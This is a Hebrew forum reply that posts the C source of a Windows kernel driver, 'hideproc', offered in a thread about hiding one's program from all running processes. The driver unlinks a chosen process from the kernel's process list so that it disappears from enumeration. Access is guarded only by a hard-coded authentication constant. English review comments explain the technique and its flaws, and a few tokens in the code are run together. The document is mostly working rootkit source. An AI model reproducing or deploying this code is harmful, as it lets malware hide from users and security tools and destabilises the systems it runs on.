
הקוד שעומד מאחורי PSLib.dll
בתגובה להודעה מספר 1 שנכתבה על ידי maorosh שמתחילה ב "קוד חדש - מעלים את השם של הפרוייקט שלך מכל התהליכים במחשב"
הנה הקוד:
/*
 * Kernel-mode driver ("hideproc") whose IOCTL interface removes a process
 * object from the kernel's linked process list and later re-inserts it, by
 * writing directly into the list pointers of neighbouring process objects.
 * What this file shows, from a defender's point of view:
 *  - the user-mode entry point is the \DosDevices\hideproc link created in
 *    DriverEntry; the only "authentication" is a constant compared in
 *    DeviceDispatch (IOCTL 1002);
 *  - DeviceDispatch dereferences the caller's buffer without checking its
 *    length, and after authentication treats a caller-supplied integer as a
 *    kernel object address (IOCTL 1002 -> AddProcessToCRP);
 *  - only the neighbours of an unlinked entry are patched; the hidden
 *    object's own Flink/Blink stay intact, which is what AddProcessToCRP
 *    uses to put it back and what a cross-view comparison of process
 *    enumerations can presumably still expose — TODO confirm on the target kernel;
 *  - nothing is re-linked on unload (see DeviceUnload).
 * NOTE(review): several tokens below look like extraction artifacts
 * (`#include"ntddk.h"`, `typedefunsignedlong`); the intended text is
 * presumably `#include "ntddk.h"` and `typedef unsigned long`.
 */
#include"ntddk.h"
typedefunsignedlong DWORD; /* see note above: presumably `typedef unsigned long` */
typedef DWORD * PDWORD;
typedefunsignedlong ULONG; /* same artifact as above */
/* User-visible symbolic link and the kernel device name it resolves to. */
const WCHAR deviceLinkBuffer[] = L"\\DosDevices\\hideproc";
const WCHAR deviceNameBuffer[] = L"\\Device\\hideproc";
/* Byte offsets inside the process object, supplied from user mode by IOCTL 1000:
 * FLINKOFFSET = offset of the LIST_ENTRY that FindProcessEPROC walks,
 * PIDOFFSET   = offset of the int compared against the requested PID.
 * Both stay 0 until initialised; DeviceDispatch refuses to act while either is 0. */
int FLINKOFFSET;
int PIDOFFSET;
/* 0 until IOCTL 1002 receives the hard-coded value; gates IOCTLs 1000 and 1001. */
int AUTHDONE;
/* IRQL saved by KeRaiseIrql inside FindProcessEPROC and restored by its caller
 * in DeviceDispatch. A single global cannot serve overlapping callers — assumes
 * one request at a time. */
KIRQL oldlvl;
DWORD FindProcessEPROC(int);
void AddProcessToCRP(int);
NTSTATUS DeviceDispatch(IN PDEVICE_OBJECT, IN PIRP);
NTSTATUS DeviceUnload(IN PDRIVER_OBJECT);
/*
 * DriverEntry: creates the \Device\hideproc device object and the
 * \DosDevices\hideproc symbolic link that user mode opens, routes
 * CREATE/CLOSE/SHUTDOWN/DEVICE_CONTROL to DeviceDispatch, installs the
 * unload routine and clears the authentication flag.
 * Returns the IoCreateDevice / IoCreateSymbolicLink failure status, else
 * STATUS_SUCCESS. RegistryPath is not used.
 * NOTE(review): no security descriptor is applied to the device here
 * (plain IoCreateDevice, not IoCreateDeviceSecure), so the default device
 * security decides which user-mode callers can open the link — confirm
 * what that default is on the target kernel.
 */
NTSTATUS DriverEntry(
IN PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
)
{
NTSTATUS ntStatus;
UNICODE_STRING deviceNameUnicodeString;
UNICODE_STRING deviceLinkUnicodeString;
PDEVICE_OBJECT devObject;
RtlInitUnicodeString (&deviceNameUnicodeString,
deviceNameBuffer );
RtlInitUnicodeString (&deviceLinkUnicodeString,
deviceLinkBuffer );
ntStatus = IoCreateDevice ( DriverObject,
8, // device-extension size (the original comment called this "exchange buffer length"; the extension is never used in this file)
&deviceNameUnicodeString,
FILE_DEVICE_UNKNOWN,
0, // no device characteristics
TRUE, // exclusive: one open handle at a time
&devObject );
if(! NT_SUCCESS(ntStatus))
{
return ntStatus;
}
// The link is what makes the device reachable from user mode through the DosDevices namespace.
ntStatus = IoCreateSymbolicLink (&deviceLinkUnicodeString,
&deviceNameUnicodeString );
if(! NT_SUCCESS(ntStatus))
{
// DriverObject->DeviceObject is the devObject created just above.
IoDeleteDevice(DriverObject->DeviceObject);
return ntStatus;
}
// One handler for every major function this driver accepts; other major functions are not handled here.
DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] =
DriverObject->MajorFunction[IRP_MJ_CREATE] =
DriverObject->MajorFunction[IRP_MJ_CLOSE] =
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DeviceDispatch;
// NOTE(review): DRIVER_UNLOAD routines return VOID; DeviceUnload is declared NTSTATUS, so this assignment relies on the mismatch being tolerated.
DriverObject->DriverUnload = DeviceUnload;
// Every load starts unauthenticated; IOCTL 1002 with the constant in DeviceDispatch sets this.
AUTHDONE=0;
return STATUS_SUCCESS;
}
/*
 * DeviceUnload: driver unload routine. If a device object exists, removes
 * the \DosDevices\hideproc link and deletes the device; both paths report
 * STATUS_SUCCESS.
 * NOTE(review): DRIVER_UNLOAD routines return VOID, so the NTSTATUS
 * returned here is never consumed by the I/O manager.
 * NOTE(review): nothing is re-linked on unload — a process unlinked by
 * IOCTL 1001 stays off the list after the driver is gone, which matters
 * when examining a system where this driver has been removed.
 */
NTSTATUS DeviceUnload(IN PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING deviceLinkUnicodeString;
PDEVICE_OBJECT p_NextObj;
p_NextObj = DriverObject->DeviceObject;
if (p_NextObj != NULL)
{
RtlInitUnicodeString( &deviceLinkUnicodeString, deviceLinkBuffer );
// Return value of IoDeleteSymbolicLink is ignored.
IoDeleteSymbolicLink( &deviceLinkUnicodeString );
// Same object as p_NextObj.
IoDeleteDevice( DriverObject->DeviceObject );
return STATUS_SUCCESS;
}
return STATUS_SUCCESS;
}
/*
 * DeviceDispatch: single handler for CREATE, CLOSE, SHUTDOWN and
 * DEVICE_CONTROL. CREATE/CLOSE/SHUTDOWN complete with STATUS_SUCCESS and
 * do nothing. DEVICE_CONTROL reads its input from the buffered SystemBuffer
 * and reports results out of band through Irp->IoStatus.Information:
 *   0   nothing to report (also every unknown control code and every
 *       1000/1001 request made before authentication)
 *   1   offsets not initialised (IOCTL 1000 not yet received)
 *   2   caller passed 0
 *   3   IOCTL 1001: no process with that PID found on the list
 *   100 IOCTL 1002: authentication accepted
 *   otherwise, for a successful 1001, the process object address itself.
 * Irp->IoStatus.Status is always STATUS_SUCCESS, even for the error codes above.
 *
 * NOTE(review): the control codes are raw integers (1000..1002) rather than
 * CTL_CODE() values; as encoded, their access bits are FILE_ANY_ACCESS, so
 * presumably any handle to the device can issue them — TODO confirm.
 * NOTE(review): SystemBuffer is dereferenced without checking it is non-NULL
 * or that InputBufferLength covers the int(s) read (8 bytes for IOCTL 1000);
 * a short or missing buffer reaches a kernel-mode dereference.
 * NOTE(review): a successful IOCTL 1001 returns a kernel address to user
 * mode, and IOCTL 1002 after authentication accepts such an address back and
 * writes kernel memory through pointers found there (see AddProcessToCRP)
 * without validating that it is a real process object.
 */
NTSTATUS DeviceDispatch(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
)
{
PIO_STACK_LOCATION irpStack;
PVOID buff = 0;
NTSTATUS ntstatus;
int find_PID = 0;
int authcode = 0;
DWORD eproc = 0;
PLIST_ENTRY plist_active_procs = NULL;
ntstatus = Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
irpStack = IoGetCurrentIrpStackLocation (Irp);
switch (irpStack->MajorFunction) {
case IRP_MJ_CREATE:
break;
case IRP_MJ_SHUTDOWN:
break;
case IRP_MJ_CLOSE:
break;
case IRP_MJ_DEVICE_CONTROL:
// Buffered request buffer; no NULL or length check follows.
buff=Irp->AssociatedIrp.SystemBuffer;
switch (irpStack->Parameters.DeviceIoControl.IoControlCode) {
case 1002: // two roles: authenticate (before AUTHDONE) or re-link a hidden process (after)
if (!AUTHDONE)
{
// The only "authentication": the first int must equal a constant compiled into the driver.
authcode=((int) (*(int *)buff));
if ( authcode == 5281982 )
{
AUTHDONE=1;
Irp->IoStatus.Information = 100;
}
}
else// once authenticated: put a previously unlinked process back on the list
{
if (FLINKOFFSET == 0 || PIDOFFSET == 0)
{
Irp->IoStatus.Information = 1; // not init
break;
}
// Despite the name, this int is the process object address that IOCTL 1001 returned in Information.
find_PID = (int) (*(int *)buff);
if (find_PID==0)
{
Irp->IoStatus.Information = 2; // zero pid/eproc
break;
}
// No IRQL raise or lock around this write, unlike the unlink path in case 1001.
AddProcessToCRP(find_PID);
}
break;
case 1000: // initialize offsets (1000)
if (!AUTHDONE) break;
// Two ints: [0] = PID offset inside the process object, [1] = list-entry offset. Neither is validated.
PIDOFFSET = (int) (*(int *)buff);
FLINKOFFSET = (int) (*((int *)buff+1));
break;
case 1001: // hide proc (1001)
if (!AUTHDONE) break;
if (FLINKOFFSET == 0 || PIDOFFSET == 0)
{
Irp->IoStatus.Information = 1; // not init
break;
}
find_PID = (int) (*(int *)buff);
if (find_PID==0)
{
Irp->IoStatus.Information = 2; // zero pid
break;
}
// FindProcessEPROC raises IRQL to DISPATCH_LEVEL and leaves it raised; both exits below lower it.
eproc = FindProcessEPROC(find_PID);
if (eproc == 0)
{
Irp->IoStatus.Information = 3; // invalid pid
KeLowerIrql(oldlvl);
break;
}
// Kernel pointer handed to user mode; it is the token IOCTL 1002 later expects back.
Irp->IoStatus.Information = eproc;
plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);
// Unlink: predecessor->Flink = successor, successor->Blink = predecessor.
// The hidden entry's own Flink/Blink are left intact (AddProcessToCRP relies on that).
// "(DWORD *)Flink+1" reaches the successor's Blink only if sizeof(DWORD) == sizeof(void *), i.e. a 32-bit build.
*((DWORD *)plist_active_procs->Blink) = (DWORD) plist_active_procs->Flink;
*((DWORD *)plist_active_procs->Flink+1) = (DWORD) plist_active_procs->Blink;
KeLowerIrql(oldlvl);
break;
}
break;
}
IoCompleteRequest( Irp, IO_NO_INCREMENT );
return ntstatus;
}
/*
 * FindProcessEPROC: walks the process list starting at the current
 * process until it finds the object whose PID (the int at PIDOFFSET)
 * equals terminate_PID. Returns that object's address, or 0 once the walk
 * has come back to the starting PID after at least one step (PID not on
 * the list). Nothing is terminated here despite the parameter's name.
 *
 * IRQL contract: this routine raises to DISPATCH_LEVEL (saving the old
 * level in the global `oldlvl`) and does NOT lower it; the caller in
 * DeviceDispatch lowers it on both the found and the not-found path. The
 * terminate_PID == 0 early exit returns *before* raising, so a caller that
 * lowers unconditionally would use a stale `oldlvl` — the current caller
 * filters 0 out beforehand ("zero pid" in DeviceDispatch).
 * NOTE(review): raising IRQL only affects this CPU; no list lock is taken,
 * so concurrent list changes on another CPU are not excluded.
 * NOTE(review): the walk assumes every node reached via Flink is a process
 * object laid out like the current one (same PIDOFFSET) — TODO confirm; a
 * list head that is not a process object would be read as if it were one.
 * NOTE(review): `elseif` below looks like an extraction artifact of `else if`.
 */
DWORD FindProcessEPROC (int terminate_PID)
{
DWORD eproc = 0x00000000;
int current_PID = 0;
int start_PID = 0;
int i_count = 0;
PLIST_ENTRY plist_active_procs;
if (terminate_PID == 0)
return terminate_PID;
// Start at the calling process and remember its PID to detect wrap-around.
eproc = (DWORD) PsGetCurrentProcess();
start_PID = *((DWORD*)(eproc+PIDOFFSET));
current_PID = start_PID;
KeRaiseIrql(DISPATCH_LEVEL,&oldlvl);
while(1)
{
if(terminate_PID == current_PID)
return eproc;
elseif((i_count >= 1) && (start_PID == current_PID))
{
return 0x00000000;
}
else {
// Step to the next list entry and convert it back to the containing process object.
plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);
eproc = (DWORD) plist_active_procs->Flink;
eproc = eproc - FLINKOFFSET;
current_PID = *((int *)(eproc+PIDOFFSET));
i_count++;
}
}
}
/*
 * AddProcessToCRP: re-inserts a process that IOCTL 1001 in DeviceDispatch
 * unlinked. The parameter is the process object's address (not a PID; it
 * is the value IOCTL 1001 returned in IoStatus.Information), and `ep` is
 * the address of its list entry at FLINKOFFSET.
 * Because the unlink left this entry's own Flink/Blink untouched, they
 * still name its former neighbours: the predecessor's Flink and the
 * successor's Blink are both pointed back at `ep`.
 * "(DWORD *)Flink+1" reaches the successor's Blink only when
 * sizeof(DWORD) == sizeof(void *) (32-bit build).
 * NOTE(review): no validation of `eproc`, no IRQL raise and no lock — any
 * value the authenticated caller supplies is dereferenced and written
 * through here. The meaning of "CRP" in the name is not given in this file.
 */
void AddProcessToCRP(int eproc)
{
DWORD ep = eproc+FLINKOFFSET;
PLIST_ENTRY plist_active_procs;
plist_active_procs = (LIST_ENTRY *) (ep);
*((DWORD *)plist_active_procs->Blink) =
*((DWORD *)plist_active_procs->Flink+1) = ep;
}